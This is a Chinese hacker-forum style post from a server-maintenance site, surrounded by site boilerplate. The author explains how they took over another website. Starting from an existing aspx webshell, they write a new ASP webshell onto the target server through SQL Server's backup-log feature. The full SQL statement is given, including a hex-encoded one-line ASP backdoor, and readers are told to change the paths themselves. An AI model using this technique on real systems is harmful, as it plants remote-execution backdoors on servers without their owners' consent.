- Rongsen.Com.Cn 版权所有 2008-2010 京ICP备08007000号 京公海网安备11010802026356号 朝阳网安编号:110105199号
- 北京黑客防线网安工作室-黑客防线网安服务器维护基地为您提供专业的
服务器维护
,企业网站维护
,网站维护
服务 - (建议采用1024×768分辨率,以达到最佳视觉效果) Powered by 黑客防线网安 ©2009-2010 www.rongsen.com.cn
作者:黑客防线网安SQL维护基地 来源:黑客防线网安SQL维护基地 浏览次数:0 |
前天帮死亡节奏提权一黑客站使用一种技术写出来大家分享。
测试环境:
windows 2003 SQLserver 2000 mysql5.x 目标站点是asp,有shell的站点是aspx。shell的SQLserver2000权限是public。
使用工具:
aspxIISpy马 专业操作SQLserver数据库马
使用aspxIISpy马得到目标路径,使用SQLserver马操作backup webshell。
语句如下:
alter database null set RECOVERY FULL;create table cmd (a image);backup log null to disk = "f:\cmd" with init;insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA);backup log null to disk = "备份路径"--
语句里边的一些东西需要自己修改!
我要申请本站:N点 | 黑客防线官网 | |
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479 |